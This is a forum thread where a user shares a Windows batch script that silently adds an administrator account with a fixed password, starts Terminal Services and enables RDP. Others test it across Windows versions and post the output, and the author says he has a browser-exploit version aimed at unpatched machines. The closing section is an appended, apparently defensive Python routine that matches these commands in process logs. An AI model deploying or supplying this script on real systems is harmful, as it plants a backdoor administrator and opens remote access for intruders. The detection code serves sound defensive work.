digip

Enable RDP and TermService via bat script

I have tested this in Windows XP Pro and it works fine. It will not work in Home editions (obviously, no RDP settings, only remote assistance). What I would like someone to do is maybe try it on Server 2003, Vista and Windows 7 (above Home edition, needs RDP capabilities), as I do not have anything above Home edition for Vista/7 and don't have Server 2003 installed anywhere at the moment.

::: Tested to work on Windows XP Pro, 
::: Will not work on Home edition (There is no TermServices for RDP, only Remote Assistance)
::: Might possibly work in Server 2003, but have not tried it yet.  
::: Adds a user "stupid" with password "password" 
::: Enables TermService and Remote Control (RDP) - DigiP
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

@echo off
net user stupid password /add && net localgroup Administrators stupid /add

SC config "TermService" start= "auto"

NET START "Terminal Services"

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F

Due to the forum's wrapping text, the last two lines of code should be one line, space between /v and fDeny.


Sure np man.

Give us a few

EDIT: K. Ran through it with 2003 server and Win7. Though admittedly I didn't actually run the batch file on my actual win7 machine =P

2003 - Fine, worked perfectly.

Win7 - Going to assume it works fine. I walked through each command, looked like it would work fine. As well as the reg entry.

(lol at the user and pass btw)


In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, what's your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are pretty much the same under the hood aside from the server's services and admin pack.

On a side note, I have this working as a sploit in Internet Explorer, using a wscript hosting flaw. On my system it prompts me if I want to run it (which of course I wouldn't other than for debugging and testing my own machine), but I'm sure there are some people out there with default installs of XP and IE with unpatched machines and even low IE security settings for Active-X and scripting. If those damn spyware apps can get in, then so will this. It's basically the same as the bat commands, just written for VBScript in the browser (and it does work in XP, and most likely Server 2003 now that you have confirmed it for me).


Pretty neat script, I remember the first time I ever had to use the remote registry feature on a Server to edit the fDenyTSConnections, I tell you nothing is more fun than running "Shutdown" commands from a server command prompt :lol:

Did you need someone to try it out on Server 2008?

Sure, if you want, cause apparently this flaw for IE affects XP, Server2003, Vista and 7, although I wasn't able to get it to work on my wife's 7 box. I may have it locked down too tight to get in, cause I don't even get the prompt in IE8 to run the code, nor does it create any users on her system.

Sure, if you want, cause apparently this flaw for IE affects XP, Server2003, Vista and 7, although I wasn't able to get it to work on my wife's 7 box. I may have it locked down too tight to get in, cause I don't even get the prompt in IE8 to run the code, nor does it create any users on her system.

I'll give it a shot when I get home tonight and post the results.

I wonder if it would work on my 7 box since I haven't exactly locked anything down. :lol:

I wonder if it would work on my 7 box since I haven't exactly locked anything down. :lol:
If it's Home edition, won't work for RDP, but should for adding a user and term service.


Heh. I'm running Win 7 Ultimate (like an idiot, cuz I hardly use RDP, but I like having my local users and group applet... )

I'll probably install a copy of 7 and Vista in a VM and see what happens.

To do list:

Install Server 2008, 7, Vista and run script.

Man I love VirtualBox. B)


So a batch file is pretty much just CMD commands listed in a certain way to perform what you want, right?

I found this site pretty cool for learning advanced windows cmd commands

http://blog.commandlinekungfu.com/

To be honest, I have not made a batch file since before Windows existed and it was only DOS, or when the first Windows came out, up to my 386DX.


Ok here's the one for Windows Server 2008:

C:\Users\Administrator\Documents>test.cmd
The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

More help is available by typing NET HELPMSG 2245.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\Administrator\Documents>

After disabling complexity requirements in GPO it worked, minus terminal services I think.

C:\Users\Administrator\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\Administrator\Documents>

It did enable remote desktop, and you can login with "stupid//password"

Next post will be for Vista.


With UAC enabled:

C:\Users\User\Documents>test
System error 5 has occurred.

Access is denied.

[SC] OpenService FAILED 5:

Access is denied.

System error 5 has occurred.

Access is denied.

ERROR: Access is denied.

C:\Users\User\Documents>

With UAC disabled:

C:\Users\User\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The requested service has already been started.

More help is available by typing NET HELPMSG 2182.

The operation completed successfully.

C:\Users\User\Documents>

The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS

The service name is invalid.

It did enable remote desktop, and you can login with "stupid//password"

In Server 2008, can you open services.msc and scroll down for Terminal Services, or something similar? I need to know the actual name of the service description. It seems that it still uses sc TermService but the actual net command uses a different name to start the service, although it looks like your system already had it running since RDP was able to start.


Windows 7:

With UAC enabled:

C:\Users\user\Documents>test.cmd
System error 5 has occurred.

Access is denied.

[SC] OpenService FAILED 5:

Access is denied.

The service name is invalid.

More help is available by typing NET HELPMSG 2185.

ERROR: Access is denied.

C:\Users\user\Documents>

Without UAC enabled:

C:\Users\user\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\user\Documents>

In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, what's your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are pretty much the same under the hood aside from the server's services and admin pack.

My IP is lol.lol.lol.XD and RDP port is open and forwarded. :P 2003 machine was a vbox testing server so I really didn't care. Like I said, I didn't actually run the script on my host, I only checked if your syntax was correct. Didn't actually add anything.


I wonder if Vista and up don't let you disable Terminal Services, that it is always on other than sc TermService set to auto, disabled, etc. If that's the case, then for Vista, 7, and 2008, all I'll need to do is create the user and enable RDP. At least nothing gets broken in the process either, so I can just leave this as is for generic means.


Ok.

For Windows 7: There is no Terminal Services service. There is one that is called "remote desktop services." It's named "TermService".

Got it to start by using this command:

C:\Users\user\Documents>SC config TermService start= auto
[SC] ChangeServiceConfig SUCCESS

Windows Vista: There is a service named "Terminal Services"; it is named "TermService".

Same command got it running:

SC config TermService start= auto

Also for Vista and W7, UAC either needs to be disabled or you need to be in an admin command shell..err window... w/e.

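Seen from the monitoring side, the commands in the script at the top of this thread leave a recognisable trail in process-creation logs. The following is an added example, not code from any poster in this thread: it flags a host where a newly created local account is put into Administrators and fDenyTSConnections is set to 0 within a short window. The record layout, host names, the five-minute window and the function names `classify` and `find_sequences` are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# One pattern per step of the batch script posted in this thread.
RULES = {
    "user_add": re.compile(r'\bnet1?(?:\.exe)?"?\s+user\s+(?P<user>\S+).*\s/add\b', re.I),
    "admin_add": re.compile(
        r'\bnet1?(?:\.exe)?"?\s+localgroup\s+"?administrators"?\s+(?P<user>\S+)\s+/add\b', re.I),
    "svc_auto": re.compile(r'\bsc(?:\.exe)?"?\s+config\s+"?TermService"?\s+start=\s*"?auto', re.I),
    "rdp_enable": re.compile(
        r'\breg(?:\.exe)?"?\s+add\s.*Terminal Server.*fDenyTSConnections.*/d\s+"?0"?(?:\s|$)', re.I),
}

# Constructed process-creation records (time, host, command line); host names are made up.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", "WS01", "net user stupid password /add"),
    ("2024-01-10T09:00:01", "WS01", "net localgroup Administrators stupid /add"),
    ("2024-01-10T09:00:02", "WS01", 'SC config "TermService" start= "auto"'),
    ("2024-01-10T09:00:02", "WS01", 'NET START "Terminal Services"'),
    ("2024-01-10T09:00:03", "WS01", r'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F'),
    ("2024-01-10T10:15:00", "WS02", "net user helpdesk * /add"),  # created, never promoted
    ("2024-01-10T10:20:00", "SRV03", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'),  # RDP being turned off
]

def classify(cmdline):
    """Return (rule_name, username or None) for the first matching rule, else None."""
    for name, rx in RULES.items():
        m = rx.search(cmdline)
        if m:
            return name, m.groupdict().get("user")
    return None

def find_sequences(events, window=timedelta(minutes=5)):
    """Flag hosts where a new local admin and an RDP enable fall within `window`."""
    hits, findings = {}, []
    for ts, host, cmdline in events:
        match = classify(cmdline)
        if match:
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), *match))
    for host, rows in hits.items():
        created = {u.lower(): t for t, r, u in rows if r == "user_add"}
        promoted = {u.lower(): t for t, r, u in rows if r == "admin_add"}
        rdp_times = [t for t, r, _ in rows if r == "rdp_enable"]
        for user in sorted(created.keys() & promoted.keys()):
            base = (created[user], promoted[user])
            if any(max(*base, t) - min(*base, t) <= window for t in rdp_times):
                findings.append({"host": host, "user": user,
                                 "termservice_set_auto": any(r == "svc_auto" for _, r, _ in rows)})
    return findings
```

The TermService start-type change is reported but not required for a finding, since the test results in this thread show the service is often already running when RDP gets enabled.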
